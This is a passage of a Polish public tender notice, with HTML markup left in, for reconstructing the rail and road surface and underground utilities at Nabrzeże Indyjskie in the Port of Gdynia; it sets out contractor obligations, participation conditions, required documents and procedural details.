prowadzenia kolejowych jazd manewrowych do poszczególnych faz robót torowych. Regulamin podlega uzgodnieniu z:a)	Bałtyckim Terminalem Zbożowym, b)	Koole Tankstorage Gdynia Sp. z o.o., c)	,,SPEED" Sp. z o.o., d)	VISTAL OFFSHORE Sp. z o.o.,e)	Przedsiębiorstwem Rol-Ryż Sp. z o.o.,f)	służbami technicznymi Zamawiającego;7)	Wykonawca zobowiązany jest do zapewnienia, na każdym etapie realizacji robót, ciągłości dostaw mediów do odbiorców. Wykonawca odpowiada za ochronę wszystkich instalacji takich jak kable, rurociągi itp. oraz zapewni właściwe zabezpieczenie tych instalacji i urządzeń na czas prowadzenia robót;8)	Wykonawca zobowiązany jest do zgłoszenia zamiaru rozpoczęcia robót właściwym gestorom sieci, (tj. przedsiębiorcom, będącym posiadaczami urządzeń przesyłowych) którzy dokonywali uzgodnień dokumentacji;9)	Wykonawca zobowiązany jest do prowadzenia robót zgodnie z warunkami wynikającymi z dokumentacji technicznej oraz z dokumentacji projektowej w taki sposób, aby nie wystąpiły uszkodzenia obiektów budowlanych i infrastruktury, zlokalizowanych na terenie budowy i niepodlegających przebudowie oraz zlokalizowanych poza terenem budowy; w przypadku wystąpienia uszkodzeń tych obiektów lub infrastruktury, Wykonawca zobowiązany jest do naprawy uszkodzeń lub odtworzenia tych obiektów lub infrastruktury;10)	Wykonawca zobowiązany jest do zapewnienia w trakcie realizacji robót odbioru wód opadowych i roztopowych oraz oświetlenia ciągów komunikacyjnych, którymi w poszczególnych etapach prowadzony będzie ruch pieszy i drogowy;11)	Wykonawca zobowiązany jest do wykonania niezbędnych, tymczasowych przełączeń sieci, po uprzednim uzgodnieniu z odbiorcami i gestorami sieci (tj. właścicielami urządzeń przesyłowych);12)	Wykonawca odpowiada za ochronę wszystkich instalacji telekomunikacyjnych na terenie budowy w tym również obcych nie podlegających przebudowie oraz zapewni właściwe zabezpieczenie tych instalacji i urządzeń na czas prowadzenia robót oraz na każdym etapie realizacji robót zapewni ciągłość eksploatacji sieci dla istniejących odbiorców; 13)	przed przystąpieniem do odbioru końcowego Wykonawca jest zobowiązany do przygotowania dokumentacji powykonawczej:a)	w formie papierowej w 3 (słownie: trzech) egzemplarzach, na którą składają się:certyfikaty, deklaracje zgodności, deklaracje właściwości użytkowych, aprobaty techniczne, atesty na materiały;wymagane dokumenty, protokoły i zaświadczenia z przeprowadzonych badań, sprawdzeń w tym monitoring TV kamerą kanałową wykonanej sieci kanalizacji deszczowej;dziennik budowy wraz z wymaganym przepisami prawa oświadczeniami kierownika budowy i projektanta;geodezyjna inwentaryzacja powykonawcza zarejestrowana w Ośrodku Dokumentacji Geodezyjno- Kartograficznej w Gdyni;rysunki zamienne dokumentujące wszystkie zmiany wprowadzone w trakcie realizacji zadania - odrębnie dla każdej branży;zestawienie wykonanych robót;b)	w formie elektronicznej, na którą składają się:geodezyjna inwentaryzacja powykonawcza w formacie dgn i dwg w układzie współrzędnych Gdańsk 2000;pomiar geodezyjny opracowany w formacie dgn i dwg z obliczeniem powierzchni lub długości poszczególnych elementów nawierzchni kolejowej i drogowej wraz z zestawieniem wykonanych robót.7.	Wszędzie tam, gdzie przedmiot zamówienia jest opisany poprzez wskazanie znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu lub norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych Zamawiający dopuszcza oferowanie przez Wykonawcę materiałów lub rozwiązań równoważnych w stosunku do opisanych w dokumentacji technicznej, pod warunkiem, że będą one posiadały, co najmniej takie same lub lepsze parametry techniczne i funkcjonalne, będą posiadały wymagane odpowiednie atesty, certyfikaty lub dopuszczenia oraz zapewnią wykonanie zamówienia zgodnie z oczekiwaniami i wymaganiami Zamawiającego określonymi w SIWZ.8.	W przypadku, gdy Wykonawca zaproponuje materiały i inne elementy równoważne, zobowiązany jest przed ich wbudowaniem uzyskać zgodę Zamawiającego oraz wykonać i dostarczyć zestawienie wszystkich zaproponowanych materiałów oraz innych elementów równoważnych i wykazać ich równoważność w stosunku do materiałów opisanych w dokumentacji technicznej stanowiącej opis przedmiotu zamówienia, ze wskazaniem nazwy, strony i pozycji przedmiaru robót, których dotyczy. 9.	Wszystkie zaproponowane przez Wykonawcę równoważne materiały lub inne elementy muszą:1)	posiadać parametry techniczne i funkcjonalne co najmniej takie same lub lepsze od określonych w dokumentacji technicznej, 2)	posiadać wymagane prawem atesty, certyfikaty lub dopuszczenia,3)	opis zaproponowanych rozwiązań równoważnych musi być na tyle szczegółowy, żeby Zamawiający mógł ocenić spełnienie wymagań dotyczących ich parametrów technicznych i funkcjonalnych oraz rozstrzygnąć, czy zaproponowane rozwiązania są równoważne. Oznacza to, że na Wykonawcy spoczywa obowiązek wykazania, że zaoferowane przez niego materiały i inne elementy są równoważne w stosunku do opisanych przez Zamawiającego.10.	Zamawiający do wszystkich nazw, znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu lub norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych wskazanych w dokumentacji technicznej stanowiącej opis przedmiotu zamówienia dopisuje wyrazy "lub równoważne".11.	Po wykonaniu wszystkich robót budowlanych wchodzących w zakres Etapu I ,,Przebudowy nawierzchni kolejowo-drogowej w I strefie Nabrzeża Indyjskiego wraz z przebudową uzbrojenia podziemnego na odcinku od Nabrzeża Rotterdamskiego do BTZ w Porcie Gdynia, na terenie działek: KM 116 - działki 10/1, 3/1, 7/1; KM 117 - działki 28/2, 4/2, obręb Gdynia w Gdyni." - po uzyskaniu pełnomocnictwa Zamawiającego - Wykonawca zobowiązany jest uzyskać, działając jako pełnomocnik Zamawiającego, pozwolenie na użytkowanie.12.	Zamawiający zastrzega, że podstawową część zamówienia, tj. roboty branży kolejowo - drogowej zobowiązany jest wykonać Wykonawca samodzielnie. Zamawiający nie dopuszcza wykonania tej części zamówienia przez podwykonawców. 13.	Wykonawca może powierzyć wykonanie części przedmiotu zamówienia podwykonawcom, z zastrzeżeniem wskazanym w pkt.12. Wykonawca wskaże w ofercie podwykonawcę/podwykonawców, którym zamierza powierzyć wykonanie danych robót wraz ze wskazaniem nazw i adresów podwykonawców (jeżeli są znane), szczegółowego przedmiotu robót oraz wartości robót wykonywanych przez podwykonawców (załącznik numer 1 do SIWZ - FORMULARZ OFERTY).14.	Zamawiający nie dopuszcza składania ofert częściowych. Zamawiający nie dopuszcza składania ofert wariantowych. 15.	Przed sporządzeniem oferty Wykonawca powinien zapoznać się z informacją o terenie i przedmiocie zamówienia przekazaną przez Zamawiającego w materiałach przetargowych oraz może uczestniczyć w wizji lokalnej ich miejsca usytuowania, lokalnych uwarunkowań realizacyjnych robót stanowiących przedmiot zamówienia. Zamawiający informuje, że w dniu 05.03.2018r. o godz. 11:00 przeprowadzi wizję lokalną, która umożliwi Wykonawcom dokładne zaznajomienie się z miejscem prowadzenia robót i poznanie lokalnych uwarunkowań realizacyjnych . Miejsce spotkania: recepcja Zarządu Morskiego Portu Gdynia S.A., ul. Rotterdamska 9. Uczestnictwo w wizji lokalnej jest nieobowiązkowe. Zamawiający dopuszcza możliwość przeprowadzenia wizji lokalnej w innym terminie uzgodnionym z Zamawiającym, na wniosek Wykonawcy. 16.	Zamawiający informuje, że kosztorysy przedmiarowe opracowane w ramach dokumentacji technicznej przez NORD - Investments Spółka z o.o. nie stanowią podstawy do sporządzenia oferty przez Wykonawcę. 17. Wykonawca zobowiązany jest we własnym zakresie (projekt budowlany, projekt wykonawczy, kosztorys przedmiarowy uzupełniony o dodatkowy zakres robót, rysunki Zamawiającego, projekt zamienny) dokonać przedmiarów robót, pozwalających rzetelnie wycenić wszystkie roboty objęte przedmiotem zamówienia. Zamawiający zamieszcza w materiałach przetargowych ,,Kosztorysy przedmiarowe" z wyszczególnionymi pozycjami do wyceny, bez podania obmiarów robót w poszczególnych pozycjach. ,,Kosztorysy przedmiarowe" w branży kolejowej i branży elektroenergetycznej zostały uzupełnione o dodatkowe pozycje. Załączone materiały mają wyłącznie charakter pomocniczy.18.	Wykonawca zobowiązany jest dostarczyć Zamawiającemu uproszczone kosztorysy sporządzone w oparciu o zaktualizowane przez siebie w ramach niniejszej umowy przedmiary robót, oddzielnie dla robót wykonywanych na podstawie pozwolenia na budowę Nr WI-II.7840.1.94.175.2015.OA z dnia 15.05.2015r. - najpóźniej w dniu przekazania terenu budowy oraz oddzielnie dla robót wykonywanych na podstawie decyzji o zmianie pozwolenia na budowę uzyskanej przez Wykonawcę - w terminie do 3 dni od daty odebrania przez Zamawiającego projektu budowlanego, dla celów rozliczeniowych robót.19.	W przypadku wystąpienia rozbieżności pomiędzy dokumentacją techniczną, a pozostałą treścią SIWZ, obowiązuje pozostała treść SIWZ</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45233250-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">24</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże się posiadaniem ubezpieczenia od odpowiedzialności cywilnej deliktowej i kontraktowej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą od 5 000 000,00 zł (słownie: pięć milionów złotych).Ocena spełnienia przez Wykonawcę w/w warunku udziału w postępowaniu zostanie dokonana na podstawie złożonych w tym postępowaniu przez Wykonawcę -dokumentów wskazanych w Rozdziale VII SIWZ ust. 1 pkt. 6) wg formuły ,,spełnia - nie spełnia".</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1. W postępowaniu mogą wziąć udział Wykonawcy, którzy posiadają odpowiednią wiedzę i doświadczenie: Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże się należytym wykonaniem w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: a)	co najmniej jednej roboty budowlanej w zakresie budowy lub przebudowy infrastruktury kolejowo - drogowej, wykonanej w technologii ułożenia torów kolejowych na płycie żelbetowej wylewanej na mokro (warunku tego nie spełnia: nawierzchnia tramwajowa, nawierzchnia na prefabrykowanych tacach kolejowych, nawierzchnia zatapiana w prefabrykowanych płytach żelbetowych i zalewanych masami termoplastycznymi) - o wartości minimum 700.000 zł (słownie: siedemset tysięcy złotych) netto;oraz b)	co najmniej jednej roboty budowlanej w zakresie budowy lub przebudowy kolejowych układów torowych (tory klasyczne) - o wartości minimum 200.000 zł (słownie: dwieście tysięcy złotych) netto;2. W postępowaniu mogą wziąć udział Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia:Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował w okresie wykonywania zamówienia i skieruje do jego realizacji osoby, które spełniają następujące wymagania tj.: a)	kierownikiem budowy, który posiada uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności inżynieryjnej kolejowej (linie, węzły i stacje kolejowe) i doświadczenie minimum 3 - letnie jako kierownik budowy lub 5 - letnie jako kierownik robót, który w tych okresach (odpowiednio: trzy lub pięcio-letnim) prowadził co najmniej jedną budowę torów na płycie żelbetowej i jedną budowę torów klasycznych (jak wyżej), realizowanych w czynnych układach torowych zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 10 września 1998 roku w sprawie warunków technicznych, jakim powinny odpowiadać budowle kolejowe i ich usytuowanie (Dz.U.1998.151.987 z późn. zm.); b)	kierownikiem robót drogowych, który posiada uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności inżynieryjnej drogowej lub konstrukcyjno - budowlanej (w tym, w zakresie dróg) oraz minimum 5 - letnie doświadczenie jako kierownik robót;c)	kierownikiem robót instalacyjnych, który posiada uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych wodociągowych i kanalizacyjnych oraz minimum 5-letnie doświadczenie jako kierownik robót;d)	kierownikiem robót elektrycznych, który posiada uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz minimum 5-letnie doświadczenie jako kierownik robót;e)	projektanci i sprawdzający, którzy posiadają uprawnienia do projektowania bez ograniczeń w specjalnościach: linie, węzły i stacje kolejowe, drogowej, elektrycznej i elektroenergetycznej, instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych. Sprawdzający [lit. e)] muszą posiadać minimum pięcioletnie doświadczenie w projektowaniu liczone od daty uzyskania uprawnień.Ocena spełnienia przez Wykonawcę w/w warunku udziału w postępowaniu zostanie dokonana na podstawie złożonych w tym postępowaniu przez Wykonawcę - dokumentów i oświadczeń wskazanych w Rozdziale VII SIWZ ust.1 pkt. 1) i pkt.4), 5), wg formuły ,,spełnia - nie spełnia".</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. Wykonawca dostarcza Zamawiającemu: 1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 2) aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 2. W miejsce podstaw wykluczenia, o których mowa w Sekcji III.2) obowiązują podstawy wykluczenia określone w Rozdziale IV § 23 Regulaminu udzielania zamówień na roboty budowlane, dostawy i usługi w Zarządzie Morskiego Portu Gdynia S.A. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Wykonawca jest zobowiązany do złożenia:1) wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania, podmiotów na rzecz których te roboty zostały wykonane (nazwa, adres/siedziba), zwanego dalej wykazem robót. Wzór wymaganego wykazu robót stanowi załącznik numer 2 do SIWZ;Do wykazu robót Wykonawca załączy dowody potwierdzające, że roboty wskazane w wykazie robót zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są np. referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty były wykonywane;2) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, odpowiedzialnych za opracowanie dokumentacji projektowej i kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia, niezbędnych do wykonywania zamówienia, zwany dalej wykazem osób. Wzór wymaganego wykazu osób stanowi załącznik numer 3 do SIWZ; 3) opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej deliktowej i kontraktowej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą od 5 000 000,00 zł (słownie: pięć milionów złotych</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) 